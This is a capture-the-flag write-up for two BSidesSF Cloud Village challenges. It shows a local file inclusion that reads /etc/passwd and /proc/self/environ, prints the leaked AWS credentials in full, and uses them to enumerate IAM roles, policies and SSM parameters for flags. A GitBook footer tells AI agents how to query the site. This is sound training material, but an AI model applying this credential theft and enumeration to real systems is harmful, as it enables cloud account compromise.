> For the complete documentation index, see [llms.txt](https://kabinet.gitbook.io/ctf-writeup/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://kabinet.gitbook.io/ctf-writeup/2023/bsidessf-cloud-village-ctf/sharing-is-caring-+-sequel.md).
# Sharing is Caring + Sequel
## Description
Using Code Sharing Platform, you found the access to the AWS temporary credentials. Now you need to get into the cloud infrastructure and start with the enumeration part, and during this process you will find the flag.
## Solution
From the description, I assumed the code sharing platform is refering to the [Tony Tony Tony](/ctf-writeup/2023/bsidessf-cloud-village-ctf/tony-tony-tony.md) challenge from before.
```javascript
var codeEditor = CodeMirror.fromTextArea(document.getElementById("code"), {
lineNumbers: true,
mode: "javascript",
theme: "default"
});
var myHeaders = new Headers();
myHeaders.append("authorizationToken", "flag-{gtkO4f4NOrJsRRNZWxiTbL6LLUs5Ir8g}");
myHeaders.append("Content-Type", "application/json");
var raw = JSON.stringify({
"codeFile": code
});
var requestOptions = {
method: 'POST',
headers: myHeaders,
body: raw,
redirect: 'follow'
};
fetch("https://jg0rh6th8e.execute-api.ap-south-1.amazonaws.com/test/share", requestOptions)
.then(response => response.text())
.then(result => {
var resultDiv = document.getElementById("result");
resultDiv.innerHTML = "";
var pre = document.createElement("pre");
pre.innerText = result;
resultDiv.appendChild(pre);
})
.catch(error => console.log('error', error));
```
However, the code from Tony Tony Tony code sharing platform is incomplete and I cant send any request. Using Postman followed the instructions from the code to send a Post request.
I sent a POST request with random value for the "codeFile" and received a stacktrace error.
After fuzzing around with the "codeFile" variable for a abit, my teammate identified a local file inclusion vulnerability where we can retrieve the `/etc/passwd` as a proof of concept.
Viewing the `/proc/self/environ` file, we are able to retrieve a set of AWS credentials.
{% code overflow="wrap" %}
```json
{
"statusCode": 200,
"body": "b'LANG=en_US.UTF-8\\x00_AWS_XRAY_DAEMON_ADDRESS=169.254.79.129\\x00AWS_LAMBDA_LOG_GROUP_NAME=/aws/lambda/ShareCodeFile\\x00AWS_LAMBDA_LOG_STREAM_NAME=2023/04/24/[$LATEST]0a87da37d7f54fd6be10cc5285ce2a29\\x00TZ=:UTC\\x00AWS_DEFAULT_REGION=ap-south-1\\x00PATH=/var/lang/bin:/usr/local/bin:/usr/bin/:/bin:/opt/bin\\x00AWS_XRAY_CONTEXT_MISSING=LOG_ERROR\\x00AWS_SESSION_TOKEN=IQoJb3JpZ2luX2VjEO7//////////wEaCmFwLXNvdXRoLTEiRjBEAiA7qPDiD9q5A6ODkehVjWH6ifRNNOaYvtr84NHZavEGdgIgE3Nosfw5i3Y6Qr3BK7QnTPpmhp4sp3+hUcVqpZSgdAkq+AII5///////////ARAAGgw2MDEyMjY4MDU3NTQiDDZtO29bajA1OvZqVyrMAqq/VlUEgfkEu+GSWDcKgUuuPGNflOFpjXtXTdD1T0PHgmFd4kTYbhcV6hyruiaSSClLog3rwCSSt2DunbSos2kRgcPrzfIOZN48Xp1WP4t1kVi/iL7oDdfc25kmrCteN7t+9KI4UMBTfAEmYk9kkCkWybzhb77f2mYyX1p7shU0lGen6NyaNc9ZNjj0CqUsYy4WPgSKZrVKT/TZ8zxntuWhn6vu+H8g2g9ogg21MA86PvNk2k6DeXzvAjPfaWFRi/cEMMPAYFUmiQrutUBoX2BN2w10by364+96XOmmrYm7U+DEQ7FPiVipVtFnGTEd3UkB9KlJpktXAnYfj7L0ZopqIfDiCGQtw8XolshxRQ1sa4xkjkcQC+Jqu3JYY5vindqK3+OtK8eCrHJ6QLJdBsaI2HmPDqszuAwT+jx2LT3+VNL9ouduMd1SI1h8MKutmKIGOp8BYoGTlNTzJdBP6EeyEYdesaG/QJQr6D5wFFMusA7M8om9pNxeYz6ueDQwUZDatZFLgTNAFtnuZFs32Y0ciSAkSIfnJ/tMKnpA5vAIJ3Q1FM1g7JRCnjbtrJzmQBlLXNSgVecCX3F6/FrbJ8mWEOMhzTGy11Sof7H8z9dhthyWwXRekCC0d5snfn5EI+ljPBtoU28/vB1dp5el4fkm/unP\\x00AWS_EXECUTION_ENV=AWS_Lambda_rapid\\x00LAMBDA_TASK_ROOT=/var/task\\x00LAMBDA_RUNTIME_DIR=/var/runtime\\x00_HANDLER=lambda_function.lambda_handler\\x00AWS_REGION=ap-south-1\\x00_AWS_XRAY_DAEMON_PORT=2000\\x00AWS_LAMBDA_RUNTIME_API=127.0.0.1:9001\\x00AWS_LAMBDA_FUNCTION_VERSION=$LATEST\\x00LD_LIBRARY_PATH=/var/lang/lib:/lib64:/usr/lib64:/var/runtime:/var/runtime/lib:/var/task:/var/task/lib:/opt/lib\\x00AWS_XRAY_DAEMON_ADDRESS=169.254.79.129:2000\\x00AWS_ACCESS_KEY_ID=ASIAYX67JAH5K2K4DN73\\x00AWS_SECRET_ACCESS_KEY=oXqei6pVOd5xMf/sw7AIeaNW6iPbHRQIEqI7Lxy2\\x00AWS_LAMBDA_FUNCTION_NAME=ShareCodeFile\\x00AWS_LAMBDA_FUNCTION_MEMORY_SIZE=128\\x00AWS_LAMBDA_INITIALIZATION_TYPE=on-demand\\x00'"
}
```
{% endcode %}
```
AWS_SESSION_TOKEN=IQoJb3JpZ2luX2VjEO7//////////wEaCmFwLXNvdXRoLTEiRjBEAiA7qPDiD9q5A6ODkehVjWH6ifRNNOaYvtr84NHZavEGdgIgE3Nosfw5i3Y6Qr3BK7QnTPpmhp4sp3+hUcVqpZSgdAkq+AII5///////////ARAAGgw2MDEyMjY4MDU3NTQiDDZtO29bajA1OvZqVyrMAqq/VlUEgfkEu+GSWDcKgUuuPGNflOFpjXtXTdD1T0PHgmFd4kTYbhcV6hyruiaSSClLog3rwCSSt2DunbSos2kRgcPrzfIOZN48Xp1WP4t1kVi/iL7oDdfc25kmrCteN7t+9KI4UMBTfAEmYk9kkCkWybzhb77f2mYyX1p7shU0lGen6NyaNc9ZNjj0CqUsYy4WPgSKZrVKT/TZ8zxntuWhn6vu+H8g2g9ogg21MA86PvNk2k6DeXzvAjPfaWFRi/cEMMPAYFUmiQrutUBoX2BN2w10by364+96XOmmrYm7U+DEQ7FPiVipVtFnGTEd3UkB9KlJpktXAnYfj7L0ZopqIfDiCGQtw8XolshxRQ1sa4xkjkcQC+Jqu3JYY5vindqK3+OtK8eCrHJ6QLJdBsaI2HmPDqszuAwT+jx2LT3+VNL9ouduMd1SI1h8MKutmKIGOp8BYoGTlNTzJdBP6EeyEYdesaG/QJQr6D5wFFMusA7M8om9pNxeYz6ueDQwUZDatZFLgTNAFtnuZFs32Y0ciSAkSIfnJ/tMKnpA5vAIJ3Q1FM1g7JRCnjbtrJzmQBlLXNSgVecCX3F6/FrbJ8mWEOMhzTGy11Sof7H8z9dhthyWwXRekCC0d5snfn5EI+ljPBtoU28/vB1dp5el4fkm/unP
AWS_REGION=ap-south-1
AWS_ACCESS_KEY_ID=ASIAYX67JAH5K2K4DN73
AWS_SECRET_ACCESS_KEY=oXqei6pVOd5xMf/sw7AIeaNW6iPbHRQIEqI7Lxy2
```
Next, I login using aws configure, and manually append the session token into the `~/.aws/credentials` file
Running `aws iam list-roles` returns a bunch of roles
```json
{
"Roles": [
{
"Path": "/service-role/",
"RoleName": "APIAuthorizer-role-htxly2ru",
"RoleId": "AROAYX67JAH5PXCHMU4DI",
"Arn": "arn:aws:iam::601226805754:role/service-role/APIAuthorizer-role-htxly2ru",
"CreateDate": "2023-04-11T05:41:15Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "lambda.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"MaxSessionDuration": 3600
},
{
"Path": "/aws-service-role/ops.apigateway.amazonaws.com/",
"RoleName": "AWSServiceRoleForAPIGateway",
"RoleId": "AROAYX67JAH5DPM2D3IHV",
"Arn": "arn:aws:iam::601226805754:role/aws-service-role/ops.apigateway.amazonaws.com/AWSServiceRoleForAPIGateway",
"CreateDate": "2023-04-11T05:04:43Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "ops.apigateway.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"Description": "The Service Linked Role is used by Amazon API Gateway.",
"MaxSessionDuration": 3600
},
{
"Path": "/aws-service-role/dynamodb.application-autoscaling.amazonaws.com/",
"RoleName": "AWSServiceRoleForApplicationAutoScaling_DynamoDBTable",
"RoleId": "AROAYX67JAH5GQPRXIFNT",
"Arn": "arn:aws:iam::601226805754:role/aws-service-role/dynamodb.application-autoscaling.amazonaws.com/AWSServiceRoleForApplicationAutoScaling_DynamoDBTable",
"CreateDate": "2023-04-08T16:55:41Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "dynamodb.application-autoscaling.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"MaxSessionDuration": 3600
},
{
"Path": "/aws-service-role/ecs.application-autoscaling.amazonaws.com/",
"RoleName": "AWSServiceRoleForApplicationAutoScaling_ECSService",
"RoleId": "AROAYX67JAH5LWWXBCO26",
"Arn": "arn:aws:iam::601226805754:role/aws-service-role/ecs.application-autoscaling.amazonaws.com/AWSServiceRoleForApplicationAutoScaling_ECSService",
"CreateDate": "2023-04-08T19:33:23Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "ecs.application-autoscaling.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"MaxSessionDuration": 3600
},
{
"Path": "/aws-service-role/ecs.amazonaws.com/",
"RoleName": "AWSServiceRoleForECS",
"RoleId": "AROAYX67JAH5BZGC632I4",
"Arn": "arn:aws:iam::601226805754:role/aws-service-role/ecs.amazonaws.com/AWSServiceRoleForECS",
"CreateDate": "2023-04-08T18:44:05Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "ecs.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"Description": "Role to enable Amazon ECS to manage your cluster.",
"MaxSessionDuration": 3600
},
{
"Path": "/aws-service-role/elasticache.amazonaws.com/",
"RoleName": "AWSServiceRoleForElastiCache",
"RoleId": "AROAYX67JAH5AA2RHP4S2",
"Arn": "arn:aws:iam::601226805754:role/aws-service-role/elasticache.amazonaws.com/AWSServiceRoleForElastiCache",
"CreateDate": "2023-04-08T18:44:08Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "elasticache.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"Description": "This policy allows ElastiCache to manage AWS resources on your behalf as necessary for managing your cache.",
"MaxSessionDuration": 3600
},
{
"Path": "/aws-service-role/elasticloadbalancing.amazonaws.com/",
"RoleName": "AWSServiceRoleForElasticLoadBalancing",
"RoleId": "AROAYX67JAH5ID7BXSSCA",
"Arn": "arn:aws:iam::601226805754:role/aws-service-role/elasticloadbalancing.amazonaws.com/AWSServiceRoleForElasticLoadBalancing",
"CreateDate": "2023-04-08T18:44:08Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "elasticloadbalancing.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"Description": "Allows ELB to call AWS services on your behalf.",
"MaxSessionDuration": 3600
},
{
"Path": "/aws-service-role/rds.amazonaws.com/",
"RoleName": "AWSServiceRoleForRDS",
"RoleId": "AROAYX67JAH5KGFGF3UWA",
"Arn": "arn:aws:iam::601226805754:role/aws-service-role/rds.amazonaws.com/AWSServiceRoleForRDS",
"CreateDate": "2023-04-08T18:44:07Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "rds.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"Description": "Allows Amazon RDS to manage AWS resources on your behalf",
"MaxSessionDuration": 3600
},
{
"Path": "/aws-service-role/support.amazonaws.com/",
"RoleName": "AWSServiceRoleForSupport",
"RoleId": "AROAYX67JAH5OJSEOXQHS",
"Arn": "arn:aws:iam::601226805754:role/aws-service-role/support.amazonaws.com/AWSServiceRoleForSupport",
"CreateDate": "2023-03-10T15:41:26Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "support.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"Description": "Enables resource access for AWS to provide billing, administrative and support services",
"MaxSessionDuration": 3600
},
{
"Path": "/aws-service-role/trustedadvisor.amazonaws.com/",
"RoleName": "AWSServiceRoleForTrustedAdvisor",
"RoleId": "AROAYX67JAH5KEKIKCCTX",
"Arn": "arn:aws:iam::601226805754:role/aws-service-role/trustedadvisor.amazonaws.com/AWSServiceRoleForTrustedAdvisor",
"CreateDate": "2023-03-10T15:41:26Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "trustedadvisor.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"Description": "Access for the AWS Trusted Advisor Service to help reduce cost, increase performance, and improve security of your AWS environment.",
"MaxSessionDuration": 3600
},
{
"Path": "/",
"RoleName": "ctfd-ecs-task-execution",
"RoleId": "AROAYX67JAH5JV676JWAN",
"Arn": "arn:aws:iam::601226805754:role/ctfd-ecs-task-execution",
"CreateDate": "2023-04-08T18:44:04Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "ECSAssumeRole",
"Effect": "Allow",
"Principal": {
"Service": "ecs-tasks.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"MaxSessionDuration": 3600
},
{
"Path": "/",
"RoleName": "ctfd-secrets-role",
"RoleId": "AROAYX67JAH5N3L6SZDHL",
"Arn": "arn:aws:iam::601226805754:role/ctfd-secrets-role",
"CreateDate": "2023-04-08T18:44:04Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "ECSTasksAssumeRole",
"Effect": "Allow",
"Principal": {
"Service": "ecs-tasks.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"MaxSessionDuration": 3600
},
{
"Path": "/service-role/",
"RoleName": "CustomAPILambdaAuth-role-03rd552i",
"RoleId": "AROAYX67JAH5DDDSFZDDT",
"Arn": "arn:aws:iam::601226805754:role/service-role/CustomAPILambdaAuth-role-03rd552i",
"CreateDate": "2023-04-11T07:28:07Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "lambda.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"MaxSessionDuration": 3600
},
{
"Path": "/service-role/",
"RoleName": "OptionsHandler-role-clu7piz8",
"RoleId": "AROAYX67JAH5GUMLLS2HX",
"Arn": "arn:aws:iam::601226805754:role/service-role/OptionsHandler-role-clu7piz8",
"CreateDate": "2023-04-19T11:29:16Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "lambda.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"MaxSessionDuration": 3600
},
{
"Path": "/service-role/",
"RoleName": "ShareCodeFile-role-sbutfhkq",
"RoleId": "AROAYX67JAH5GNBPLQTIR",
"Arn": "arn:aws:iam::601226805754:role/service-role/ShareCodeFile-role-sbutfhkq",
"CreateDate": "2023-04-11T05:09:38Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "lambda.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"MaxSessionDuration": 3600
}
]
}
```
The role `ShareCodeFile-role-sbutfhkq` seems interesting as the name is same as our user.
Running `aws iam list-role-policies --role-name role-name` to list out the names of the inline policies embedded in the specified IAM role
```
{
"PolicyNames": [
"SSMParametersLISTREAD",
"ZmxhZy17a0drMTlzQmN3TlJua2FyWkZLYW1vS1E0TzZzQzRpSjF9"
]
}
```
Decoding the base64 strings return the flag
Flag: `flag-{GaW6NW8vzwIhh8qU643AV3ohh4gwDByw}`
## Sharing is Caring Sequel
From the policy name, i make a guess that I have permission to list and read parameters in SSM
{% embed url="" %}
Running `aws ssm describe-parameters` shows the flag location
I am then able to use `aws ssm get-parameter --name "/envcodeshare/test/flag"` to retrieve the flag value
Flag: `flag-{fUg3jZueA4J1u7nEVNqLFVASEZcyYjR0}`
---
# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.
## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:
```
GET https://kabinet.gitbook.io/ctf-writeup/2023/bsidessf-cloud-village-ctf/sharing-is-caring-+-sequel.md?ask=&goal=
```
`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.